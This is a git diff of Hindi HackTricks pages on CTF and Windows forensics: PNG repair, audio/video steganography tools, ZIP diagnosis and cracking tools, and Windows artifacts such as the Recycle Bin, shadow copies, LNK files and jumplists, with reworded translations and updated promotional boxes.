github रेपो में।
+{% endhint %} + +**PNG फ़ाइलें** **CTF चैलेंज** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिन्हें छुपी डेटा को एम्बेड करने के लिए आदर्श बनाया गया है। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छुपे जानकारी या विसंगतियों को प्रकट करते हैं। + +PNG फ़ाइल की अखंडता की जाँच करने और क्षति को मरम्मत करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो ऑनलाइन सेवाएं जैसे [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) कोरप्टेड PNG की मरम्मत के लिए एक वेब-आधारित समाधान प्रदान करती हैं, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं। + +ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छुपे या खोए गए डेटा को खोजने और पुनर्प्राप्त करने में मदद करती हैं। + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +हैकट्रिक्स का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 **डिस्कॉर्ड समूह** (https://discord.gg/hRep4RUj7f) या **टेलीग्राम समूह** (https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 96a41e1fc..40268847c 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,40 +1,14 @@ -
+{% hint style="success" %} +**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक मुख्य तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग करके गुप्त संदेशों को छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं। -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण करने के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ को खोजने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गाने को धीमा करना या उलटा करना छिपे संदेशों का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है। -HackTricks का समर्थन करने के अन्य तरीके: +**कम सांकेतिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का शोषण करता है ताकि डेटा को गुप्त रूप से समाहित किया जा सके। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है। -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +वीडियो चैलेंज अक्सर ऑडियो और वीडियो स्ट्रीम्स को बंडल करने वाले कंटेनर फ़ॉर्मेट्स को शामिल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेट्स का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है। -
+यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को दर्शाता है, जहां प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा को खोलने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है। -**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक महत्वपूर्ण तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं। - -ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गानों को धीमा करना या उलटना छुपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है। - -**कम सार्वजनिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग गुप्त रूप से डेटा समाहित करने के लिए करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है। - -वीडियो चैलेंज अक्सर कंटेनर फ़ॉर्मेट का सामाग्री जोड़ने वाले होते हैं जो ऑडियो और वीडियो स्ट्रीम्स को बंडल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेटों का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है। - -यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को प्रकट करता है, जहाँ प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा का पता लगाने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है। - -# संदर्भ +## संदर्भ * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - -
- -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! - -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। - -
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d0478d17f..85a20e407 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,27 +1,46 @@ -# ZIPs tricks +# ZIPs ट्रिक्स + +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रिपॉसिटरी में।
+{% endhint %} -**कमांड लाइन उपकरण** जो **ज़िप फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं जो ज़िप फ़ाइलें निदान, मरम्मत और क्रैकिंग के लिए हैं। यहाँ कुछ मुख्य उपयोगी उपकरण हैं: +**कमांड-लाइन टूल्स** जो **zip फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं, zip फ़ाइलें का निदान करने, मरम्मत करने, और क्रैक करने के लिए। यहाँ कुछ मुख्य उपयोगी उपकरण हैं: -- **`unzip`**: बताता है कि ज़िप फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है। -- **`zipdetails -v`**: ज़िप फ़ाइल प्रारूप क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है। -- **`zipinfo`**: ज़िप फ़ाइल की सामग्री की सूची बनाता है बिना उन्हें निकाले। -- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त ज़िप फ़ाइलों को मरम्मत करने की कोशिश करें। -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: ज़िप पासवर्ड की ब्रूट-फोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है। +- **`unzip`**: बताता है कि एक zip फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है। +- **`zipdetails -v`**: zip फ़ाइल प्रारूप के क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है। +- **`zipinfo`**: उन्हें निकाले बिना zip फ़ाइल की सामग्री की सूची देता है। +- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त zip फ़ाइलों को मरम्मत करने का प्रयास करें। +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: zip पासवर्ड का ब्रूट-फ़ोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 वर्णों तक के पासवर्ड के लिए प्रभावी है। -[ज़िप फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) ज़िप फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है। +[Zip फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) zip फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है। -महत्वपूर्ण नोट: पासवर्ड से सुरक्षित ज़िप फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार नहीं एन्क्रिप्ट** करती हैं, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करती हैं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई ज़िप फ़ाइलें एक **प्लेनटेक्स्ट हमले** के लिए संवेदनशील हैं यदि किसी अनएन्क्रिप्टेड कॉपी की उपलब्ध है। एक उपलब्ध फ़ाइल का ज्ञात सामग्री का उपयोग करके ज़िप का पासवर्ड क्रैक करने के लिए यह हमला किया जा सकता है, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई ज़िप फ़ाइलें इस प्लेनटेक्स्ट हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विध +महत्वपूर्ण है कि पासवर्ड से सुरक्षित zip फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार एन्क्रिप्ट नहीं करतीं**, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करतीं जो इस सूचना को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई zip फ़ाइलें एक **सादाकथन हमला** के लिए विकल्पशील हैं अगर किसी अनएन्क्रिप्टेड कॉपी की एक कम्प्रेस्ड फ़ाइल उपलब्ध है। यह हमला जानी गई सामग्री का उपयोग करता है ताकि zip का पासवर्ड क्रैक किया जा सके, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई zip फ़ाइलें इस सादाकथन हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विधियों का चयन करने की महत्वता को प्रदर्शित करती है। + +## संदर्भ +* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रिपॉसिटरी में। + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index f51a5e102..3b1178e02 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -2,19 +2,20 @@ ## Windows आर्टिफैक्ट्स +{% hint style="success" %} +AWS हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**. +* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके**.
+{% endhint %}
@@ -30,7 +31,7 @@ HackTricks का समर्थन करने के अन्य तरी ### टाइमलाइन -टाइमलाइन एक Windows विशेषता है जो वेब पेजों के यातायात, संपादित दस्तावेज़ और चलाए गए एप्लिकेशनों का **कालांतरिक इतिहास** प्रदान करता है। +टाइमलाइन एक Windows विशेषता है जो वेब पेजों के दौरे, संपादित दस्तावेज़ और चलाए गए एप्लिकेशनों का **कालांतरिक इतिहास** प्रदान करता है। डेटाबेस पथ `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db` में स्थित है। इस डेटाबेस को एक SQLite उपकरण के साथ खोला जा सकता है या उपकरण [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) के साथ जो 2 फ़ाइलें उत्पन्न करता है जो उपकरण [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) के साथ खोली जा सकती हैं। @@ -42,15 +43,15 @@ HackTricks का समर्थन करने के अन्य तरी ### रीसाइकल बिन -Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्राइव की रूट में फ़ोल्डर **`$Recycle.bin`** में पाया जा सकता है (`C:\$Recycle.bin`)।\ +Vista/Win7/Win8/Win10 में **रीसाइकल बिन** को ड्राइव की रूट में फ़ोल्डर **`$Recycle.bin`** में पाया जा सकता है (`C:\$Recycle.bin`)।\ जब इस फ़ोल्डर में एक फ़ाइल हटाई जाती है तो 2 विशिष्ट फ़ाइलें बनाई जाती हैं: -* `$I{id}`: फ़ाइल सूचना (जब यह हटाई गई थी की तारीख} +* `$I{id}`: फ़ाइल की जानकारी (जब यह हटाई गई थी की तारीख} * `$R{id}`: फ़ाइल की सामग्री ![](<../../../.gitbook/assets/image (486).png>) -इन फ़ाइलों के साथ आप उपकरण [**Rifiuti**](https://github.com/abelcheung/rifiuti2) का उपयोग करके हटाई गई फ़ाइलों का मूल पता और हटाई गई तारीख प्राप्त कर सकते हैं (Vista – Win10 के लिए `rifiuti-vista.exe` का उपयोग करें)। +इन फ़ाइलों के साथ आप उपकरण [**Rifiuti**](https://github.com/abelcheung/rifiuti2) का उपयोग करके हटाई गई फ़ाइलों का मूल पता और हटाई गई तारीख प्राप्त कर सकते हैं (Vista - Win10 के लिए `rifiuti-vista.exe` का उपयोग करें)। ``` .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` @@ -58,7 +59,7 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा ### वॉल्यूम शैडो कॉपी -शैडो कॉपी एक तकनीक है जो माइक्रोसॉफ्ट विंडोज में शामिल है जो कंप्यूटर फ़ाइल या वॉल्यूम की **बैकअप कॉपियां** या स्नैपशॉट बना सकती है, भले ही वे उपयोग में हों। +शैडो कॉपी एक तकनीक है जो माइक्रोसॉफ्ट विंडोज में शामिल है जो कंप्यूटर फ़ाइल या वॉल्यूम की **बैकअप कॉपी** या स्नैपशॉट बना सकती है, भले ही वे उपयोग में हों। ये बैकअप्स आम तौर पर `\System Volume Information` में रूट फ़ाइल सिस्टम से स्थित होते हैं और उनका नाम निम्नलिखित छवि में दिखाए गए **UIDs** से मिलकर बनता है: @@ -68,11 +69,11 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा ![](<../../../.gitbook/assets/image (521).png>) -रजिस्ट्री एंट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` फ़ाइलें और कुंजीयों को शामिल करती है **जिन्हें बैकअप न करें**: +रजिस्ट्री एंट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` फ़ाइलें और कुंजियों को शामिल करती है **जिन्हें बैकअप न करना** है: ![](<../../../.gitbook/assets/image (522).png>) -रजिस्ट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` में भी `वॉल्यूम शैडो कॉपियों` के बारे में विन्यास सूचना होती है। +रजिस्ट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` में भी `वॉल्यूम शैडो कॉपी` के बारे में विन्यास सूचना होती है। ### ऑफिस ऑटोसेव्ड फ़ाइलें @@ -84,16 +85,16 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा ### हाल की दस्तावेज़ (LNK) -विंडोज **स्वचालित रूप से** ये **शॉर्टकट** बनाता है जब उपयोगकर्ता एक फ़ाइल **खोलता है, उपयोग करता है या बनाता है**: +विंडोज **स्वचालित रूप से** ये **शॉर्टकट** बनाता है जब उपयोगकर्ता **फ़ाइल खोलता है, उपयोग करता है या बनाता है**: * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -जब एक फ़ोल्डर बनाया जाता है, तो एक लिंक फ़ाइल फ़ोल्डर, माता-पिता फ़ोल्डर और परदादी फ़ोल्डर का भी बनाया जाता है। +जब एक फ़ोल्डर बनाया जाता है, तो एक लिंक फ़ाइल बनाई जाती है, जिसमें फ़ोल्डर, माता-पिता फ़ोल्डर और परदादी फ़ोल्डर का लिंक शामिल होता है। -ये स्वचालित रूप से बनाए गए लिंक फ़ाइलें **मूल के बारे में जानकारी रखती हैं** जैसे कि यह कोई **फ़ाइल है** या एक **फ़ोल्डर**, उस फ़ाइल के **MAC समय**, जहाँ फ़ाइल संग्रहित है और **लक्षित फ़ाइल का फ़ोल्डर**। यह जानकारी उन फ़ाइलों को पुनः प्राप्त करने के लिए उपयोगी हो सकती है जिन्हें हटा दिया गया था। +ये स्वचालित रूप से बनाए गए लिंक फ़ाइलें **मूल के बारे में जानकारी शामिल करती हैं** जैसे कि यह कोई **फ़ाइल है** या एक **फ़ोल्डर**, उस फ़ाइल के **MAC समय**, जहाँ फ़ाइल संग्रहित है और **लक्षित फ़ाइल का फ़ोल्डर**। यह जानकारी उन फ़ाइलों को पुनः प्राप्त करने में सहायक हो सकती है जो हटा दी गई थीं। -इसके अलावा, लिंक फ़ाइल की **निर्मित तिथि** वह **समय** है जब मूल फ़ाइल का **पहली बार उपयोग** किया गया था और लिंक फ़ाइल का **संशोधित तिथि** वह **समय** है जब मूल फ़ाइल का **अंतिम बार उपयोग** किया गया था। +इसके अलावा, लिंक फ़ाइल का **निर्माण तिथि** वह **समय** है जब मूल फ़ाइल का **पहली बार उपयोग** किया गया था और लिंक फ़ाइल का **संशोधित तिथि** वह **समय** है जब मूल फ़ाइल का **अंतिम बार उपयोग** किया गया था। इन फ़ाइलों की जांच करने के लिए आप [**LinkParser**](http://4discovery.com/our-tools/) का उपयोग कर सकते हैं। @@ -108,7 +109,7 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा 2. लिंक एक्सेस तिथि 3. लिंक निर्माण तिथि। -पहले सेट का टाइमस्टैम्प **फ़ाइल इसल्फ के टाइमस्टैम्प्स** को संदर्भित करता है। दूसरा सेट **लिंक की फ़ाइल के टाइमस्टैम्प्स** को संदर्भित करता है। +पहले सेट का टाइमस्टैम्प फ़ाइल इसल्फ के **टाइमस्टैम्प्स** को संदर्भित करता है। दूसरा सेट लिंक फ़ाइल के **टाइमस्टैम्प्स** को संदर्भित करता है। आप विंडोज CLI उपकरण चलाकर इसी जानकारी को प्राप्त कर सकते हैं: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` @@ -116,11 +117,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` ### जम्पलिस्ट्स -ये हाल के फ़ाइलें हैं जो प्रति एप्लिकेशन द्वारा दर्शाई जाती हैं। यह एक ऐसी **सूची है जिसमें एक एप्लिकेशन द्वारा उपयोग की गई हाल की फ़ाइलें** हैं जिसे आप प्रत्येक एप्लिकेशन पर एक्सेस कर सकते हैं। ये **स्वचालित रूप से बनाई जा सकती हैं या कस्टम** हो सकती हैं। +ये हाल के फ़ाइलें हैं जो प्रति एप्लिकेशन द्वारा दर्शाई जाती हैं। यह एक **एप्लिकेशन द्वारा उपयोग की गई हाल की फ़ाइलों की सूची** है जिसे आप प्रत्येक एप्लिकेशन पर एक्सेस कर सकते हैं। ये **स्वचालित रूप से बनाई जाती हैं या कस्टम हो सकती हैं**। -**स्वचालित रूप से बनाए गए जम्पलिस्ट्स** `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` में संग्रहित होते हैं। जम्पलिस्ट्स का नाम इस प्रारूप का होता है `{id}.autmaticDestinations-ms` जहां प्रारंभिक आईडी एप्लिकेशन की आईडी होती है। +**स्वचालित रूप से बनाए गए जम्पलिस्ट्स** 